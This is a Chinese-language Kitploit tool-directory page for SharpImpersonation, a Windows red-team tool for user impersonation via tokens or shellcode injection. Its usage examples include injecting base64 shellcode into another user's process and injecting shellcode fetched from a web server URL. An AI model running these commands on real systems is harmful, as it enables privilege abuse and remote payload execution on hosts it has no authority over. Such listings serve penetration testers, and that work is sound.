Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SharpImpersonation — 用户模拟工具 - 通过令牌或Shellcode注入 | Kitploit
工具/GitHubGitHub/s3cur3th1ssh1t/sharpimpersonation
权限提升冒充工具后渗透利用红队
GitHubs3cur3th1ssh1t/sharpimpersonation

SharpImpersonation

用户模拟工具 - 通过令牌或Shellcode注入

查看仓库
421754年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SharpImpersonation

这是一个边做边学的项目。使用广为人知的技术构建了又一个模仿工具,与其他公开工具相比进行了一些改进。代码库取自:

  • https://github.com/0xbadjuju/Tokenvator

介绍性博客文章可在此处找到:

  • https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

列出用户进程

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe list

alt text

仅列出提升权限的进程

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe list elevated

模仿目标用户的第一个进程以启动新的二进制文件

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>

alt text

将 base64 编码的 shellcode 注入目标用户的第一个进程

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>

alt text

将从 Web 服务器加载的 shellcode 注入目标用户的第一个进程

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>

alt text

通过 ImpersonateLoggedOnuser 模拟目标用户以实现当前会话

root@kitploit:~
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser

alt text

下载工具